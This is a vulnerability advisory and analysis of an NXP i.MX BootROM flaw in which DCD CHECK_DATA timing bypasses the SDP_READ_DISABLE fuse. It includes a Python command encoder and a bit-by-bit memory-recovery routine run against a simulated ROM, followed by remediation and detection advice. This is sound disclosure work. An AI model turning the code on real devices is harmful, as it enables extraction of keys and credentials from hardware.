Full Report
NXP i.MX SoCs have various fuse configurations for security-sensitive operations. Once a fuse has been blown, the functionality it controls is disabled forever. The SDP_READ_DISABLE fuse is meant to stop the Serial Download Protocol (SDP) interface, which runs over USB or UART, from being used to read out arbitrary memory, such as crypto keys, auth tokens and many other things.

The boot image on NXP devices supports Device Configuration Data (DCD) sequences. These are commonly used to set up I/O interfaces for the boot loader, initialize clocks and so on. When the device fails to boot, it drops into SDP boot mode, which exposes the WRITE_DCD command. The DCD CHECK_DATA command instructs the BootROM to read a 32-bit value at a specified address, AND it with a mask and test the result against a condition. The BootROM polls until the condition holds, or, if a count is specified, until that many polls have been made. The catch is that this happens regardless of whether the SDP_READ_DISABLE fuse is blown. That is a violation of the intended security policy.

DDR memory is volatile, so this shouldn't be a big deal, right? It turns out that DDR contents decay very slowly once refresh cycles stop, so data from the previous boot is frequently still there. The goal is to use CHECK_DATA as a DDR read primitive. This was done by collecting several timing samples for a sweep of reads: the execution time of the command correlates directly with whether the masked bits match the expected condition, so the timing side channel reveals the bits in memory one mask at a time.

The high level of this attack:

1. Induce the loading of the sensitive data into memory. This step is application specific.
2. Force the device into SDP mode. This can be done by grounding a few boot-configuration pins on the chip or by forcing a failure in the boot process some other way.
3. Initialize the DDR controller via DCD. The attack reads from DDR, so the controller must be up before any CHECK_DATA against DDR addresses.
4. Execute the timing side-channel read attack against DDR.
Overall, an awesome blog post on a logic issue that led to a bypass of the chip's security, and a very well written article as well.
Analysis Summary
# Vulnerability: NXP i.MX BootROM Timing Side-Channel via DCD CHECK_DATA
## CVE Details
- **CVE ID:** CVE-2022-45163 (the identifier assigned to the NCC Group SDP_READ_DISABLE fuse bypass advisory)
- **CVSS Score:** 5.3 (Medium)
- **CWE:** CWE-203 (Information Exposure Through Discrepancy in Execution Time), CWE-285 (Improper Authorization)
## Affected Systems
- **Products:** NXP i.MX Series System-on-Chips (SoCs).
- **Versions:** Multiple series including i.MX 6, i.MX 7, and i.MX 8 (specific versions may vary based on BootROM implementation).
- **Configurations:** Systems where the `SDP_READ_DISABLE` fuse is blown to prevent unauthorized memory read access via the Serial Download Protocol (SDP).
## Vulnerability Description
The vulnerability exists in the BootROM’s implementation of the Device Configuration Data (DCD) `CHECK_DATA` command. While the `SDP_READ_DISABLE` fuse is intended to block all memory read operations via the UART/USB interface to protect sensitive data (such as cryptographic keys or auth tokens), the BootROM fails to restrict the `CHECK_DATA` command.
The command instructs the BootROM to poll a memory address, AND the value with a mask, and test the result against a condition (all masked bits set or clear, or any masked bit set or clear). The poll loop exits as soon as the condition holds; otherwise it runs for the full count given in the command, or forever if no count was given. With a single-bit mask, the time between issuing the command and the BootROM's next response therefore tells the attacker whether that bit is set, so memory, including DDR contents that survived a reset because the cells have not yet decayed, can be recovered bit by bit, bypassing the fuse's intended policy.
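To make the timing oracle concrete, here is an added example (not code from the NCC Group advisory, from NXP, or from the Full Report above): a Python model of the DCD CHECK_DATA encoding and of the BootROM's poll loop, together with the bit-by-bit recovery that both the Full Report and the description above refer to. The tag and flag values are my reading of the HAB4 DCD command format and must be checked against the reference manual of the exact part; the `SimulatedBootRom` timing constants, the sample DDR contents and every function name are assumptions constructed for this example. On real hardware the measured quantity is the wall-clock round trip of the WRITE_DCD exchange over USB or UART, and the sample count must be tuned to the observed jitter.

```python
import random
import statistics
import struct

# HAB4 DCD encoding. ASSUMPTION: tag values and flag bits are my reading of the
# HAB4 DCD command format; verify them against your part's reference manual.
DCD_TAG = 0xD2
DCD_VERSION = 0x41            # 0x40 on i.MX 6, 0x41 on i.MX 7 / i.MX 8M
CMD_WRITE_DATA = 0xCC
CMD_CHECK_DATA = 0xCF

FLAG_ALL_CLEAR = 0x00         # poll until (*addr & mask) == 0
FLAG_ALL_SET = 0x08           # poll until (*addr & mask) == mask
FLAG_ANY_CLEAR = 0x10         # poll until (*addr & mask) != mask
FLAG_ANY_SET = 0x18           # poll until (*addr & mask) != 0


def check_data_cmd(address, mask, flags=FLAG_ALL_SET, count=None, width=4):
    """Encode one CHECK_DATA command: tag, big-endian length, parameter byte
    (flags | access width), then address, mask and the optional poll count."""
    body = struct.pack(">II", address, mask)
    if count is not None:
        body += struct.pack(">I", count)
    return struct.pack(">BHB", CMD_CHECK_DATA, 4 + len(body), flags | width) + body


def dcd(commands):
    """Wrap encoded commands in a DCD header so they can be sent with WRITE_DCD."""
    body = b"".join(commands)
    return struct.pack(">BHB", DCD_TAG, 4 + len(body), DCD_VERSION) + body


class SimulatedBootRom:
    """Stand-in for the BootROM's CHECK_DATA handler (assumed model, not ROM code).
    It models only the poll loop's timing: one poll when the condition already
    holds, otherwise the full count. The memory dict plays the role of DDR whose
    contents survived the reset. Note that the fuse is never consulted here,
    which is exactly the flaw being described."""

    def __init__(self, memory, ns_per_poll=250.0, jitter_ns=40.0, seed=1):
        self.memory = memory            # word-aligned address -> 32-bit value
        self.ns_per_poll = ns_per_poll  # assumed cost of one poll iteration
        self.jitter_ns = jitter_ns      # assumed measurement noise (std dev)
        self.rng = random.Random(seed)  # deterministic noise for the example

    def run_check_data(self, cmd):
        """Return the simulated elapsed time in nanoseconds for one command."""
        tag, length, param = struct.unpack(">BHB", cmd[:4])
        if tag != CMD_CHECK_DATA:
            raise ValueError("not a CHECK_DATA command")
        address, mask = struct.unpack(">II", cmd[4:12])
        count = struct.unpack(">I", cmd[12:16])[0] if length == 16 else None
        masked = self.memory.get(address, 0) & mask
        satisfied = {
            FLAG_ALL_CLEAR: masked == 0,
            FLAG_ALL_SET: masked == mask,
            FLAG_ANY_CLEAR: masked != mask,
            FLAG_ANY_SET: masked != 0,
        }[param & 0x18]
        if satisfied:
            polls = 1
        elif count is None:
            raise RuntimeError("CHECK_DATA without a count never returns")
        else:
            polls = count
        return polls * self.ns_per_poll + self.rng.gauss(0, self.jitter_ns)


def recover_word(rom, address, count=64, samples=5):
    """Recover one 32-bit word by testing each bit with a single-bit mask and
    classifying the response time against the midpoint between the one-poll
    (bit set) and count-poll (bit clear) cases. The median of a few samples
    absorbs jitter; on real hardware you would time the SDP round trip."""
    threshold = rom.ns_per_poll * (1 + count) / 2
    word = 0
    for bit in range(32):
        cmd = check_data_cmd(address, 1 << bit, FLAG_ALL_SET, count)
        elapsed = statistics.median(rom.run_check_data(cmd) for _ in range(samples))
        if elapsed < threshold:
            word |= 1 << bit
    return word


def recover_range(rom, start, words):
    """Sweep consecutive words, as the Full Report describes for a DDR region."""
    return [recover_word(rom, start + 4 * i) for i in range(words)]


# Constructed sample: two words a previous boot left behind in DDR (not real data).
DDR_BASE = 0x8000_0000
LEFTOVER_DDR = {DDR_BASE: 0xDEADBEEF, DDR_BASE + 4: 0x00C0FFEE}

if __name__ == "__main__":
    rom = SimulatedBootRom(LEFTOVER_DDR)
    print([hex(w) for w in recover_range(rom, DDR_BASE, 2)])
    print(dcd([check_data_cmd(DDR_BASE, 1, FLAG_ALL_SET, 64)]).hex())
```

The count field is what makes this a usable oracle: with a count, a non-matching bit costs a bounded delay and the ROM stays responsive for the next command, whereas without one an unsatisfied check spins forever, which still leaks the bit (the ROM goes silent) but costs a reset for every clear bit. The threshold sits halfway between the two expected timings, so the margin grows with the count at the price of a slower sweep.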
## Exploitation
- **Status:** PoC demonstrated by researchers; no known widespread exploitation in the wild.
- **Complexity:** High (Requires precise timing measurements and physical access to trigger SDP mode).
- **Attack Vector:** Physical (Access to boot pins or inducing boot failure is required to enter SDP mode).
## Impact
- **Confidentiality:** High (Ability to read memory reachable from a DCD sequence, including DDR contents left behind by the previous boot, potentially recovering keys, tokens or firmware components).
- **Integrity:** None (The primitive is a read-only side-channel).
- **Availability:** None.
## Remediation
### Patches
- **Hardware Revision:** The check lives in the BootROM (mask ROM in the silicon), so it cannot be patched by a software or firmware update on affected chips; only a revised BootROM in new silicon can enforce `SDP_READ_DISABLE` on CHECK_DATA. Treat deployed parts as permanently affected and rely on the workarounds below.
### Workarounds
- **Disable SDP Entirely:** Fuses such as `SJC_DISABLE` only lock out the JTAG debug port; they do not stop the BootROM from entering serial download. Blocking this attack at the fuse level means disabling the serial download path itself (the `SDP_DISABLE` fuse on parts that provide it), which also removes the device's field-recovery path, so weigh that against the need to reflash bricked units.
- **Secure Boot (HAB):** Ensure High Assurance Boot (HAB) is fully enabled, which may limit the impact of unauthorized DCD sequences in certain configurations.
- **Memory Cleansing:** Zero sensitive data in DDR as soon as it is no longer needed and before any reset path the attacker can trigger (forced boot failures and watchdog resets included), not only on an orderly shutdown. This does not protect against "frozen" RAM or cold-boot styles of data remanence, where the attacker removes power before any scrubbing can run.
## Detection
- **Indicators of Compromise:** The BootROM keeps no log, so there is no on-chip record of SDP activity. Look for physical evidence instead: boot-configuration pins strapped or grounded, a USB/UART cable attached to the recovery port, and unexplained boot failures on units that then come back up normally.
- **Detection Methods:** Monitoring for unusually high volumes of `CHECK_DATA` commands over SDP only works where you control the SDP host, i.e. manufacturing or recovery tooling that logs the DCDs it sends; an attacker using their own host leaves no such trace on the device.
## References
- **NXP Advisory:** [https://www.nxp.com/docs/en/product-selector-guide/IMX6_SEC_ADVISORY.pdf](https://www.nxp.com/docs/en/product-selector-guide/IMX6_SEC_ADVISORY.pdf)
- **NCC Group Research:** Technical Advisory – NXP i.MX SDP_READ_DISABLE Fuse Bypass (CVE-2022-45163), published on research.nccgroup.com (2022)
- **NVD Entry:** [https://nvd.nist.gov/vuln/detail/CVE-2022-45163](https://nvd.nist.gov/vuln/detail/CVE-2022-45163)